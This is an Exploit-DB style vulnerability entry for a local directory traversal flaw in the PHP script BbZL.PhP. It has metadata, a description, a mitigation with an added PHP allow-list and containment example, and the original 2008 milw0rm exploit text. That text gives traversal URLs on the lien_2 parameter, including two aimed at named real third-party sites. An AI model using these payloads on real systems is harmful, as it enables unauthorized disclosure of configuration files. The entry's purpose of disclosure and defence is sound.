Vendor: BbZL.PhP
By: jiko
CVSS: 7.5 (HIGH)
Type: Directory Traversal
CWE: 22
Product Name: BbZL.PhP
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Local Directory Traversal

A local directory traversal vulnerability exists in BbZL.PhP, which allows an attacker to access sensitive files outside of the web root directory. This can be exploited by sending a specially crafted HTTP request containing directory traversal characters (e.g. '../') to the vulnerable script. Successful exploitation may lead to the disclosure of sensitive information.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file operations.
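
One way to apply this mitigation in PHP, shown as an added example that is not BbZL.PhP's own code: an allow-list of page names backed by a canonical-path containment check. The function `resolve_page`, the `pages/` layout and the allow-list entries are assumptions; only the `lien_2` parameter name comes from the report.

```php
<?php
// Added example, not BbZL.PhP source. resolve_page(), the pages/ layout and
// the allow-list are assumptions; only the lien_2 parameter is from the report.

function resolve_page(string $baseDir, array $allowed, string $name): ?string
{
    // 1. Allow-list: only known page names are ever mapped to a file.
    if (!in_array($name, $allowed, true)) {
        return null;
    }
    // 2. Canonicalise, then confirm the result is still inside $baseDir.
    //    realpath() resolves ".." and symlinks, and fails on missing files.
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $name . '.php');
    if ($path === false || !is_file($path)) {
        return null;
    }
    // Compare with a trailing separator so "pages_old" cannot pass as "pages".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed demo tree: pages/news.php is public, config.php sits one level up.
$root = sys_get_temp_dir() . '/bbzl_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/pages', 0700, true);
file_put_contents($root . '/pages/news.php', 'news');
file_put_contents($root . '/config.php', 'secret');

// '../config' is a deliberate allow-list mistake to exercise step 2.
$allowed = ['news', 'links', '../config'];

// In a real handler $input would be $_GET['lien_2'] (checked with is_string()).
foreach (['news', 'links', 'config', '../config', '../'] as $input) {
    $path = resolve_page($root . '/pages', $allowed, $input);
    printf("%-10s => %s\n", $input, $path === null ? 'rejected' : 'served ' . basename($path));
}

// Remove the demo tree.
unlink($root . '/pages/news.php');
unlink($root . '/config.php');
rmdir($root . '/pages');
rmdir($root);
```

Only `news` resolves to a file. `../config` is refused by the containment check even though it was (wrongly) placed on the allow-list, which is why both steps are kept.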
Source

Exploit-DB raw data:

-------------------------------------------------------------------------
  --          JIKI Team [ JIKO + KIl1er ]        ---
-------------------------------------------------------------------------
# Author  : jiko
# email  : jalikom@hotmail.com
# Home   : www.no-back.org
# Script  : BbZL.PhP
# Bug   : Local Directory Traversal
# Download  : http://sylvain.pasquet1.free.fr/index.php?type=1&base=vjek&nom=Téléchargements
=========================JIkI Team===================
# Exploit  :
 http://localhost/cc/bbzl092/index.php?type=3&lien_2=../
#ex   :
http://sylvain.pasquet1.free.fr/index.php?type=3&lien_2=config
http://barbeuzweb.free.fr/index.php?type=3&lien_2=config
=========================JIKI Team===================
 greetz : all my friend and H-T Team and Stack-Terrorist and Gold_M and all No-back members and tryag.Com
 visit: www.no-back.org & www.tryag.com 
-------------------------------------------------------------------------
  --            JIKI Team [ JIKO + KIl1er ]    --
-------------------------------------------------------------------------

# milw0rm.com [2008-09-28]